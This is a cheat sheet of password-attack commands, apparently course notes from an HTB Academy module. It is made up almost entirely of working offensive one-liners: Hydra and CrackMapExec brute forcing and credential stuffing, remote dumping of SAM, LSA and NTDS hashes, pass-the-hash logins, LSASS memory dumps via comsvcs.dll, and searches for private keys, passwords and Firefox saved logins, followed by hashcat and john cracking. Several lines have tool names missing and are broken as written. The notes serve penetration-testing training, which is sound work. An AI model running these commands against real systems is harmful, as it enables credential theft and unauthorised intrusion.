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Password attacks


Default credentials in services

Connecting to Target

# CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol
xfreerdp /v:<ip> /u:htb-student /p:HTB_@cademy_stdnt!
# Uses Evil-WinRM to establish a Powershell session with a target. 
evil-winrm -i <ip> -u user -p password
# Uses SSH to connect to a target using a specified user.
ssh user@<ip>
# Uses smbclient to connect to an SMB share using a specified user.
smbclient -U user \\\\<ip>\\SHARENAME
# Uses to create a share on a linux-based attack host. Can be useful when needing to transfer files from a target to an attack host.
python3 -smb2support CompData /home/<nameofuser>/Documents/

Password mutations

# Uses cewl to generate a wordlist based on keywords present on a website.
cewl -d 4 -m 6 --lowercase -w inlane.wordlist
# Uses Hashcat to generate a rule-based word list.
hashcat --force password.list -r custom.rule --stdout > mut_password.list
# Users username-anarchy tool in conjunction with a pre-made list of first and last names to generate a list of potential username. 
./username-anarchy -i /path/to/listoffirstandlastnames.txt
# Uses Linux-based commands curl, awk, grep and tee to download a list of file extensions to be used in searching for files that could contain passwords. 
curl -s \| html2text \| awk '{print tolower($1)}' \| grep "\." \| tee -a compressed_ext.txt

Remote Password Attacks

# Uses CrackMapExec over WinRM to attempt to brute force user names and passwords specified hosted on a target.
crackmapexec winrm <ip> -u user.list -p password.list
# Uses CrackMapExec to enumerate smb shares on a target using a specified set of credentials. 
crackmapexec smb <ip> -u "user" -p "password" --shares
# Uses Hydra in conjunction with a user list and password list to attempt to crack a password over the specified service.
hydra -L user.list -P password.list <service>://<ip>
# Uses Hydra in conjunction with a username and password list to attempt to crack a password over the specified service.
hydra -l username -P password.list <service>://<ip>
# Uses Hydra in conjunction with a user list and password to attempt to crack a password over the specified service.
hydra -L user.list -p password <service>://<ip>  
# Uses Hydra in conjunction with a list of credentials to attempt to login to a target over the specified service. This can be used to attempt a credential stuffing attack.
hydra -C <user_pass.list> ssh://<IP>
# Uses CrackMapExec in conjunction with admin credentials to dump password hashes stored in SAM, over the network. 
crackmapexec smb <ip> --local-auth -u <username> -p <password> --sam
# Uses CrackMapExec in conjunction with admin credentials to dump lsa secrets, over the network. It is possible to get clear-text credentials this way. 
crackmapexec smb <ip> --local-auth -u <username> -p <password> --lsa
# Uses CrackMapExec in conjunction with admin credentials to dump hashes from the ntds file over a network. 
crackmapexec smb <ip> -u <username> -p <password> --ntds
# Uses Evil-WinRM to establish a Powershell session with a Windows target using a user and password hash. This is one type of `Pass-The-Hash` attack.
evil-winrm -i <ip>  -u  Administrator -H "<passwordhash>" 

Windows Local Password Attacks

# A command-line-based utility in Windows used to list running processes.
tasklist /svc                        
# Uses Windows command-line based utility findstr to search for the string "password" in many different file type.
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
# A Powershell cmdlet is used to display process information. Using this with the LSASS process can be helpful when attempting to dump LSASS process memory from the command line. 
Get-Process lsass
# Uses rundll32 in Windows to create a LSASS memory dump file. This file can then be transferred to an attack box to extract credentials. 
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
# Uses Pypykatz to parse and attempt to extract credentials & password hashes from an LSASS process memory dump file. 
pypykatz lsa minidump /path/to/lsassdumpfile
# Uses reg.exe in Windows to save a copy of a registry hive at a specified location on the file system. It can be used to make copies of any registry hive (i.e., hklm\sam, hklm\security, hklm\system).
reg.exe save hklm\sam C:\
# Uses move in Windows to transfer a file to a specified file share over the network. 
move \\<ip>\NameofFileShare
# Uses to dump password hashes from the SAM database.
python3 -sam -security -system LOCAL
# Uses Windows command line based tool vssadmin to create a volume shadow copy for `C:`. This can be used to make a copy of NTDS.dit safely. 
vssadmin CREATE SHADOW /For=C:
# Uses Windows command line based tool copy to create a copy of NTDS.dit for a volume shadow copy of `C:`. 
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit 

Linux Local Password Attacks

# Script that can be used to find .conf, .config and .cnf files on a Linux system.
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null \| grep -v "lib\|fonts\|share\|core" ;done

# Script that can be used to find credentials in specified file types. 
for i in $(find / -name *.cnf 2>/dev/null \| grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null \| grep -v "\#";done

# Script that can be used to find common database files.
for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null \| grep -v "doc\|lib\|headers\|share\|man";done

# Uses Linux-based find command to search for text files.
find /home/* -type f -name "*.txt" -o ! -name "*.*"

# Script that can be used to search for common file types used with scripts. 
for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null \| grep -v "doc\|lib\|headers\|share";done

# Script used to look for common types of documents.
for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null \| grep -v "lib\|fonts\|share\|core" ;done

# Uses Linux-based cat command to view the contents of crontab in search for credentials.
cat /etc/crontab

# Uses Linux-based  ls -la command to list all files that start with `cron` contained in the etc directory. 
ls -la /etc/cron.*/                             

# Uses Linux-based command grep to search the file system for key terms `PRIVATE KEY` to discover SSH keys. 
grep -rnw "PRIVATE KEY" /* 2>/dev/null \| grep ":1"

# Uses Linux-based grep command to search for the keywords `PRIVATE KEY` within files contained in a user's home directory. 
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null \| grep ":1"

# Uses Linux-based grep command to search for keywords `ssh-rsa` within files contained in a user's home directory. 
grep -rnw "ssh-rsa" /home/* 2>/dev/null \| grep ":1"

# Uses Linux-based tail command to search the through bash history files and output the last 5 lines. 
tail -n5 /home/*/.bash*

# Runs using python3.

# Runs using bash.

# Runs with all modules using python2.7             |
python2.7 all

# Uses Linux-based command to search for credentials stored by Firefox then searches for the keyword `default` using grep. 
ls -l .mozilla/firefox/ \| grep default 

# Uses Linux-based command cat to search for credentials stored by Firefox in JSON. 
cat .mozilla/firefox/1bplpd86.default-release/logins.json \| jq .

# Runs to decrypt any encrypted credentials stored by Firefox. Program will run using python3.9. 

# Runs browsers module using Python 3.
python3 browsers

Cracking Passwords

# Uses Hashcat to crack NTLM hashes using a specified wordlist.
hashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt

# Uses Hashcat to attempt to crack a single NTLM hash and display the results in the terminal output. 
hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt --show

# Uses unshadow to combine data from passwd.bak and shadow.bk into one single file to prepare for cracking. 
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes

# Uses Hashcat in conjunction with a wordlist to crack the unshadowed hashes and outputs the cracked hashes to a file called unshadowed.cracked. 
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked

# Uses Hashcat in conjunction with a word list to crack the md5 hashes in the md5-hashes.list file. 
hashcat -m 500 -a 0 md5-hashes.list rockyou.txt

# Uses Hashcat to crack the extracted BitLocker hashes using a wordlist and outputs the cracked hashes into a file called backup.cracked. 
hashcat -m 22100 backup.hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt -o backup.cracked

# Runs script to generate hashes for the SSH keys in the SSH.private file, then redirects the hashes to a file called ssh.hash. SSH.private > ssh.hash

# Uses John to attempt to crack the hashes in the ssh.hash file, then outputs the results in the terminal. 
john ssh.hash --show

# Runs against a protected .docx file and converts it to a hash stored in a file called protected-docx.hash. Protected.docx > protected-docx.hash

# Uses John in conjunction with the wordlist rockyou.txt to crack the hash protected-docx.hash. 
john --wordlist=rockyou.txt protected-docx.hash

# Runs script to convert a pdf file to a pdf has to be cracked. PDF.pdf > pdf.hash

# Runs John in conjunction with a wordlist to crack a pdf hash. 
john --wordlist=rockyou.txt pdf.hash            

# Runs Zip2john against a zip file to generate a hash, then adds that hash to a file called zip.hash. 
zip2john > zip.hash

# Uses John in conjunction with a wordlist to crack the hashes contained in zip.hash. 
john --wordlist=rockyou.txt zip.hash

# Uses Bitlocker2john script to extract hashes from a VHD file and directs the output to a file called backup.hashes. 
bitlocker2john -i Backup.vhd > backup.hashes

# Uses the Linux-based file tool to gather file format information. 
file GZIP.gzip

# Script that runs a for-loop to extract files from an archive. 
for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null \| tar xz;done
Last update: 2025-01-21
Created: July 15, 2023 17:03:48